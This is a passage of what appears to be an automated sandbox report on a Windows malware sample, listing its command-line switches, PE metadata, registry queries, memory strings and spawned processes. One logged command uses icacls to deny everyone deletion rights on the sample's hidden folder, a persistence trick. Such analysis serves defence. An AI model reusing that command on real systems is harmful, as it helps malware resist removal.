              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: x2W,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: x*V,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: C:\Windows\,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: D:\Windows\,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: 7V,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: %username%,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: F:\,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --Admin,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: IsAutoStart,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: IsTask,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --ForNetRes,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --Task,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --AutoStart,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --Service,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: X1V,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: x2W,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: x*V,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: C:\Windows\,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: D:\Windows\,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: 7V,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: %username%,2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: F:\,2_2_00479F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --Admin,3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: IsAutoStart,3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: IsTask,3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --ForNetRes,3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --Task,3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --AutoStart,3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --Service,3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: C:\Windows\,3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: D:\Windows\,3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: %username%,3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: F:\,3_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --Admin,4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: IsAutoStart,4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: IsTask,4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --ForNetRes,4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --Task,4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --AutoStart,4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --Service,4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: C:\Windows\,4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: D:\Windows\,4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: %username%,4_2_00E49F90
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: F:\,4_2_00E49F90
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, String found in binary or memory: set-addPolicy
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, String found in binary or memory: id-cmc-addExtensions
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, File read: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
              Source: unknown, Process created: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55" /deny *S-1-1-0:(OI)(CI)(DE,DC)
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Process created: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe "C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --Admin IsNotAutoStart IsNotTask
              Source: unknown, Process created: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe --Task
              Source: unknown, Process created: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe "C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --AutoStart
              Source: unknown, Process created: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe "C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --AutoStart
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static file information: File size 1150976 > 1048576
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306454387.00000000038CC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299485751.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299340114.0000000003840000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2315942860.00000000038F8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307467722.00000000038D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2367136260.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360571973.000000000331B000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2368122855.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2361063125.000000000331B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297833112.0000000003309000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\b source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298890596.0000000003B02000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307527322.0000000003AF0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306204411.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\N,tAM source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359906462.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362164144.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ Z0@g source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298890596.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ult\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2015348604.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017889756.0000000003336000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359906462.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362164144.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298890596.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\e\j source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360193328.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359314886.0000000003B38000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\o source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314093672.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316169449.000000000333A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316398950.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2355137046.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003B30000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\be\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017927846.0000000003301000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046303739.0000000003302000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046429413.0000000003321000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046565289.0000000003327000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ata\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276405605.00000000032F8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276474116.00000000032FC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.ppvw source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\*\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275071344.0000000003303000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275036397.0000000003300000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275912662.0000000003304000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2381664053.0000000003B94000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369942184.0000000003C21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366153323.0000000003C20000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369942184.0000000003C21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362545370.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366153323.0000000003C20000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2040839710.0000000003359000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017927846.0000000003301000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276510131.0000000003355000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275508085.000000000334E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251738485.0000000003353000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275299047.000000000334D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046220490.0000000003341000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046303739.0000000003302000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2018734898.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 
